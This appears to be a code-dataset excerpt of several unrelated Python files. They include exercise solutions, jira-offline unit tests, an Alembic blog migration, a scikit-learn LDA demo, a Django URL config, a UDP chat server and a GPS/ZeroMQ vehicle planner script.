eaaa0e9a1a66be306450e7ea8d242ebbcd2ccbbf | f9640f1eee714b0788d1b6314bcf12b7369e9374 | /Beginner/1001.py | 4892fb59526abb83cc0c9a8f63b7feb180bb7612 | [] | no_license | Txiag/URI-Python | b5c39649fd6a239da60ad045d548b5c83fa2db29 | ace48fc516cdfa3d5964369e6cdb710ae023cba0 | refs/heads/master | 2020-04-11T19:57:56.811574 | 2019-04-20T09:26:55 | 2019-04-20T09:26:55 | 162,053,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41 | py | print("X =", int(input())+int(input()))
| [
"[email protected]"
] | |
76c54e28ed384643636c1d9bc0edcbeeeb1519e7 | cdc1d827d37acf51e742af96b5cb5cfecbc3cdf8 | /unitTest.py | eca4ecc7422993d075de6fc25418ba728ace8034 | [] | no_license | corygoates/PropulsionOptimization | 9e52612fb14cd3c0b2eac38078be92b5b3742ec4 | 2e2a510045175afa08b208b3b6e5af00ead1701f | refs/heads/master | 2020-03-28T15:01:39.778279 | 2018-09-18T16:35:29 | 2018-09-18T16:35:29 | 148,547,972 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 437 | py | import propulsionUnitClass as unit
prop = "kyosho_10x6"
motor = "Kontronik Pyro 700-34"
battery = "Turnigy 5000mAh 40C"
numCells = 3
esc = "Kontronic SUN 3000"
altitude = 2000
test = unit.PropulsionUnit(prop, motor, battery, numCells, esc, altitude, True)
print("Initialization complete. Plotting thrust curves.")
maxAirspeed = 100
numVelocities = 11
numThrottles = 100
test.PlotThrustCurves(maxAirspeed, numVelocities, numThrottles)
| [
"[email protected]"
] | |
aaef2aed639eb6b69a0b8d76fd8e02c85dd8e4a8 | 512ac9a9159c6b93d6f0a08449c9efae9200fe42 | /test/sync/test_push_issues.py | 54f1d26c0f343c33dcd872882c32c559b2f19f03 | [
"MIT"
] | permissive | FROSADO/jira-offline | 9c9d801377a50fe1c0b467ec6257d04cef51e2dc | 53d5c9f61bc1bbb96e999be0374e85d981729f96 | refs/heads/master | 2023-06-04T15:56:21.088300 | 2021-06-19T09:59:38 | 2021-06-19T09:59:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,643 | py | '''
Tests for push_issues() in the sync module
'''
from unittest import mock
from fixtures import (ISSUE_1, ISSUE_1_WITH_ASSIGNEE_DIFF, ISSUE_1_WITH_FIXVERSIONS_DIFF, ISSUE_2,
ISSUE_NEW)
from jira_offline.models import Issue
from jira_offline.sync import IssueUpdate, push_issues
@mock.patch('jira_offline.sync.merge_issues')
@mock.patch('jira_offline.sync.issue_to_jiraapi_update')
def test_push_issues__calls_fetch_and_check_resolve_once_per_issue(
mock_issue_to_jiraapi_update, mock_merge_issues, mock_jira
):
'''
Ensure fetch_issue(), merge_issues() and issue_to_jiraapi_update() are called
once per modified issue
'''
# add an unchanged Issue and two modified Issues to the Jira dict
mock_jira['TEST-71'] = Issue.deserialize(ISSUE_1)
mock_jira['TEST-71.1'] = Issue.deserialize(ISSUE_1_WITH_ASSIGNEE_DIFF)
mock_jira['TEST-71.2'] = Issue.deserialize(ISSUE_1_WITH_FIXVERSIONS_DIFF)
with mock.patch('jira_offline.sync.jira', mock_jira), mock.patch('jira_offline.jira.jira', mock_jira):
push_issues()
assert mock_jira.fetch_issue.call_count == 2
assert mock_merge_issues.call_count == 2
assert mock_issue_to_jiraapi_update.call_count == 2
@mock.patch('jira_offline.sync.merge_issues')
@mock.patch('jira_offline.sync.issue_to_jiraapi_update')
def test_push_issues__calls_update_issue_when_issue_has_an_id(
mock_issue_to_jiraapi_update, mock_merge_issues, mock_jira
):
'''
When Issue.id is set, ensure update_issue() is called, and new_issue() is NOT called
'''
# add a modified Issue to the Jira dict
mock_jira['TEST-71'] = Issue.deserialize(ISSUE_1_WITH_ASSIGNEE_DIFF)
# mock merge_issues to return NO conflicts
mock_merge_issues.return_value = IssueUpdate(merged_issue=mock_jira['TEST-71'])
with mock.patch('jira_offline.sync.jira', mock_jira), mock.patch('jira_offline.jira.jira', mock_jira):
push_issues()
assert mock_jira.update_issue.called
assert not mock_jira.new_issue.called
@mock.patch('jira_offline.sync.merge_issues')
@mock.patch('jira_offline.sync.issue_to_jiraapi_update')
def test_push_issues__calls_new_issue_when_issue_doesnt_have_an_id(
mock_issue_to_jiraapi_update, mock_merge_issues, mock_jira
):
'''
When Issue.id is NOT set, ensure new_issue() is called, and update_issue() is NOT called
'''
# add a modified Issue to the Jira dict
mock_jira[ISSUE_NEW['key']] = Issue.deserialize(ISSUE_NEW)
# mock merge_issues to return NO conflicts
mock_merge_issues.return_value = IssueUpdate(merged_issue=mock_jira[ISSUE_NEW['key']])
with mock.patch('jira_offline.sync.jira', mock_jira), mock.patch('jira_offline.jira.jira', mock_jira):
push_issues()
assert not mock_jira.update_issue.called
assert mock_jira.new_issue.called
@mock.patch('jira_offline.sync.merge_issues')
@mock.patch('jira_offline.sync.issue_to_jiraapi_update')
def test_push_issues__skips_issues_from_unconfigured_projects(
mock_issue_to_jiraapi_update, mock_merge_issues, mock_jira
):
'''
Ensure issues from unconfigured projects are ignored
'''
mock_jira['TEST-71'] = Issue.deserialize(ISSUE_1_WITH_ASSIGNEE_DIFF)
mock_jira['TEST-72'] = Issue.deserialize(ISSUE_2)
mock_jira['TEST-72'].project_id = 'notarealprojecthash'
with mock.patch('jira_offline.sync.jira', mock_jira), mock.patch('jira_offline.jira.jira', mock_jira):
push_issues()
assert mock_jira.fetch_issue.call_count == 1
assert mock_merge_issues.call_count == 1
assert mock_issue_to_jiraapi_update.call_count == 1
| [
"[email protected]"
] | |
390d864c98c6ed559e483260cfeea4971b289ead | b7f65250b675bd2bf299be8a901b39bef70af742 | /migrations/versions/b3435cda41c5_initial_database.py | 314ed3f8923398447c4aef73a8991af10ddb6555 | [] | no_license | ShoneKey/blog | 3fc997f5f2b38003efb9fb0140233303eb35341a | b6a32096e2d8ebba1ab55eca0d4abff41c15e810 | refs/heads/master | 2021-01-21T14:57:16.051412 | 2017-06-30T13:43:38 | 2017-06-30T13:43:38 | 95,362,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,572 | py | """initial database
Revision ID: b3435cda41c5
Revises:
Create Date: 2017-06-21 17:25:42.299000
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'b3435cda41c5'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('categories',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=128), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('roles',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=64), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('tags',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=128), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('users',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('username', sa.String(length=64), nullable=True),
sa.Column('role_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['role_id'], ['roles.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_users_username'), 'users', ['username'], unique=True)
op.create_table('posts',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('title', sa.String(length=64), nullable=True),
sa.Column('body', sa.Text(), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.Column('author_id', sa.Integer(), nullable=True),
sa.Column('category_id', sa.Integer(), nullable=True),
sa.Column('tag_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['author_id'], ['users.id'], ),
sa.ForeignKeyConstraint(['category_id'], ['categories.id'], ),
sa.ForeignKeyConstraint(['tag_id'], ['tags.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('title')
)
op.create_index(op.f('ix_posts_timestamp'), 'posts', ['timestamp'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_posts_timestamp'), table_name='posts')
op.drop_table('posts')
op.drop_index(op.f('ix_users_username'), table_name='users')
op.drop_table('users')
op.drop_table('tags')
op.drop_table('roles')
op.drop_table('categories')
# ### end Alembic commands ###
| [
"[email protected]"
] | |
226b414598d38521cd196653069584391b141cf3 | 115a27e29bba3e73b60bcc5016f80a541c52e790 | /ML_by_OMAR/Part9-Dimensionality-Reduction/LDA_OMAR.py | 043bb121d0c8501c2dc486f52c3bfab00ada79ac | [] | no_license | OmarSayd/Machine-Learning-with-OMAR | 16bba0e4c679c61cd9fd977f5317ec698babb2b3 | a97de325f889b3f0a7d67dd888ac8ec355af858a | refs/heads/master | 2022-11-18T08:50:05.558521 | 2020-07-10T11:01:26 | 2020-07-10T11:01:26 | 278,610,307 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,095 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 9 17:03:33 2020
@author: Linear Discriminant Analysis by OMAR
"""
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Wine.csv')
X = dataset.iloc[:, 0:13].values
y = dataset.iloc[:, 13].values
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
# LDA
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
lda = LDA(n_components= 2)
X_train = lda.fit_transform(X_train, y_train)
X_test = lda.transform(X_test)
# Training the Logistic Regression model on the Training set
from sklearn.linear_model import LogisticRegression
classifier = LogisticRegression(random_state = 0)
classifier.fit(X_train, y_train)
# Predicting the Test set results
y_pred = classifier.predict(X_test)
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix, classification_report
cm = confusion_matrix(y_test, y_pred)
print(classification_report(y_test, y_pred))
# Visualising the Training set results
from matplotlib.colors import ListedColormap
X_set, y_set = X_train, y_train
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),
np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
alpha = 0.75, cmap = ListedColormap(('red', 'green', 'blue')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
c = ListedColormap(('red', 'green', 'blue'))(i), label = j)
plt.title('Logistic Regression (Training set)')
plt.xlabel('LD1')
plt.ylabel('LD2')
plt.legend()
plt.show()
# Visualising the Test set results
from matplotlib.colors import ListedColormap
X_set, y_set = X_test, y_test
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),
np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
alpha = 0.75, cmap = ListedColormap(('red', 'green', 'blue')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
c = ListedColormap(('red', 'green', 'blue'))(i), label = j)
plt.title('Logistic Regression (Test set)')
plt.xlabel('LD1')
plt.ylabel('LD2')
plt.legend()
plt.show() | [
"[email protected]"
] | |
437b56faa6c50f981f254c73f7c99dab8e2e5756 | 6e06f7fea4e64f139ddd6be9d140b5ff183746c7 | /rest-app/smartpicasso/urls.py | 146dbd032969b6123f1295fa95f76c0bf7aba75f | [] | no_license | dolatapatryk/smart-picasso | fb467fb5f7669d8ae238509191e1d0ffec64d557 | 73b44a2d6c466a0c21864da132027029f8af35dd | refs/heads/main | 2023-03-06T13:30:01.265853 | 2021-02-21T13:14:00 | 2021-02-21T13:14:00 | 340,902,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 945 | py | """smartpicasso URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('api/', include('smartpicasso.app.user.urls')),
path('api/', include('smartpicasso.app.user_profile.urls')),
path('api/', include('smartpicasso.app.project.urls')),
path('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
a31559b9e7241b52ad9e5f2149bb26ca5c0b7ae7 | b853c16efafa74a9e1cb076008a17c9d85389fca | /HOME/笔记/聊天室/cr-sever.py | 1fa2a940328c8a608ee7b540d71ae9d97e89b866 | [] | no_license | Jason0221/backup | 14c48f1adb871b915d6f0ba49a26396e7cf0cd64 | dfd54cbcf7c27b0df6249104747e9a7ceffcb392 | refs/heads/master | 2020-06-03T13:14:39.751679 | 2017-05-15T08:50:38 | 2017-05-15T08:50:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 842 | py | #!/usr/bin/python
#coding=utf-8
from socket import *
from time import *
import sys
def login():
data,addr = sockfd.recvfrom(BUFERSIZE)
b = {data:addr}
a.update(b)
print data,'login'
print a
def chat():
# while True:
data,addr = sockfd.recvfrom(BUFERSIZE)
for i in a.keys():
sockfd.sendto(ctime(),a[i])
HOST = '10.1.1.130'
PORT = int(sys.argv[1])
ADDR = (HOST,PORT)
BUFERSIZE = 1024
sockfd = socket(AF_INET,SOCK_DGRAM,0)
sockfd.bind(ADDR)
a = {}
print "server strat...."
while True:
data,addr = sockfd.recvfrom(BUFERSIZE)
if data[0] == '*':
b = {data:addr}
a.update(b)
print a
for i in a.keys():
print 'i=:',i
print 'a[%s]:%s'%(i[1:],a[i])
sockfd.sendto('haha',a[i])
print '--------------------'
sockfd.close()
| [
"[email protected]"
] | |
4b170f7a2731de34cd240506f56d441b9303df3b | 8b54ed7d5f52d52f5f0a45911410337a79682c0a | /src/plannerm2.py | 0148c3e5e7097675be1c64172da39905ad210d10 | [
"MIT"
] | permissive | hanbro-inha/react-flask-UI | ce2d19500ae776d6df7cc46c28834290c58b0988 | 6c121802356b14e8c8278018fd05d7d53f4c49e6 | refs/heads/master | 2022-02-11T10:27:54.542523 | 2020-03-01T11:28:48 | 2020-03-01T11:28:48 | 244,133,727 | 0 | 0 | null | 2022-01-21T20:23:54 | 2020-03-01T11:05:45 | Python | UTF-8 | Python | false | false | 5,455 | py | import socket
import pygame
import time
import math
from pygame.locals import *
from shapely.geometry import Point
from shapely.geometry.polygon import Polygon
import pynmea2
import pymap3d
import serial
import zmq
import threading
ZMQ_WAVE_PORT = 5555
ZMQ_OP_PORT = 5558
pygame.init()
screen = pygame.display.set_mode((200,200))
pygame.display.set_caption('V2X')
clock = pygame.time.Clock()
ser = serial.Serial('/dev/ttyUSB0', 115200)
context = zmq.Context()
socket = context.socket(zmq.SUB)
pub = context.socket(zmq.PUB)
class Plannerm:
def __init__(self):
self.base_lat = 37.3847120383
self.base_lon = 126.65599282
self.base_alt = 45.538
#signal region constant
pt1 = -284,-342
pt2 = -296,-362
pt3 = -273,-376
pt4 = -261,-354
pt5 = -672,-34
pt6 = -687,-57
pt7 = -664,-75
pt8 = -648,-50
#line constant
self.P1X = -283
self.P1Y = -346
self.P2X = -668
self.P2Y = -52
region_1 = [pt1, pt2, pt3, pt4]
region_2 = [pt5, pt6, pt7, pt8]
self.polygon1 = Polygon(region_1)
self.polygon2 = Polygon(region_2)
#thread shared
self.v2x_data = None
self.v2x_addr = None
self.time_a = 0
self.time_b = 0
self.state_a = 0
self.state_b = 0
self.loc = None #(dist, inside)
def get_xy(self, lat, lon, alt):
e, n, u = pymap3d.geodetic2enu(lat, lon, alt, self.base_lat, self.base_lon, self.base_alt)
return e, n
def parseNmea(self, dat):
dat = dat.decode("utf-8", "ignore")
if dat[0:6] == '$GNGGA':
msg = pynmea2.parse(dat)
x, y = self.get_xy(msg.latitude, msg.longitude, msg.altitude)
return x, y
return x, y
def loc_check(self,dat):
dist = 0
while 1:
try:
x, y = self.parseNmea(dat.readline())
except:
continue
tmp = 2
#for region
point = Point(x, y)
inside = 1 if self.polygon1.contains(point) else 0
inside = 2 if self.polygon2.contains(point) else 0
#for dist
if tmp == 1:
dist = math.sqrt((int(x) - self.P1X)**2 + (int(y) - self.P1Y)**2)
elif tmp == 2:
dist = math.sqrt((int(x) - self.P2X)**2 + (int(y) - self.P2Y)**2)
self.loc = (dist, inside)
def display(self, str):
text = font.render(str, True, (255, 255, 255), (159, 182, 205))
textRect = text.get_rect()
textRect.centerx = screen.get_rect().centerx
textRect.centery = screen.get_rect().centery
screen.blit(text, textRect)
pygame.display.update()
def v2x_stat(self):
socket.connect("tcp://192.168.123.253:5555")
socket.setsockopt(zmq.SUBSCRIBE, b"wave")
while 1:
result = socket.recv()
topic = result.decode()
if(topic.startswith('ff')):
try:
_, self.time_a, self.state_a, self.time_a, self.state_b, _ = topic.split('//')
print("Parsed")
except:
print("Split Failed")
def looper(self):
data = "cc//0//0//0"
enable = 0
speed = 0
pub.bind("tcp://*:%s" % ZMQ_OP_PORT)
while 1:
pygame.event.pump()
keys = pygame.key.get_pressed()
if keys[K_o]:
enable = 1
elif keys[K_p]:
enable = 0
if enable == 1:
print('auto')
ta, sa, tb, sb = self.time_a, self.state_a, self.time_b, self.state_b
print("State1: %s, Time1: %s, State2: %s, Time2: %s, dist: %s inside : %d"
% (sa, ta, sb, tb, self.loc[0], self.loc[1]))
if(self.loc[1] and (sb == '3')):
data="cc//1//-2//0"
elif(self.loc[1] and (sb == '7')):
data="cc//1//-2//0"
else:
data="cc//0//0//0"
else:
print("Manual")
data = 'cc//0//0//0'
if keys[K_q]:
speed, enable = -1.5, 1
elif keys[K_w]:
speed, enable = -0.5, 1
elif keys[K_e]:
speed, enable = -0.1, 1
elif keys[K_a]:
speed, enable = 1.5, 1
elif keys[K_s]:
speed, enable = 0.5, 1
elif keys[K_d]:
speed, enable = 0.1, 0
data = "cc//" + str(enable) + "//" + str(speed) + "//0"
message = "planner" + data
pub.send(message.encode('ascii'))
clock.tick(100)
def run(self):
t1 = threading.Thread(target=self.v2x_stat)
t2 = threading.Thread(target=self.loc_check, args=(ser,))
# t3 = threading.Thread(target=self.looper)
t1.setDaemon(True)
t2.setDaemon(True)
t1.start()
t2.start()
self.looper()
# t3.run()
t1.join()
t2.join()
# t3.join()
def main():
planner = Plannerm()
planner.run()
if __name__ == '__main__':
main()
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.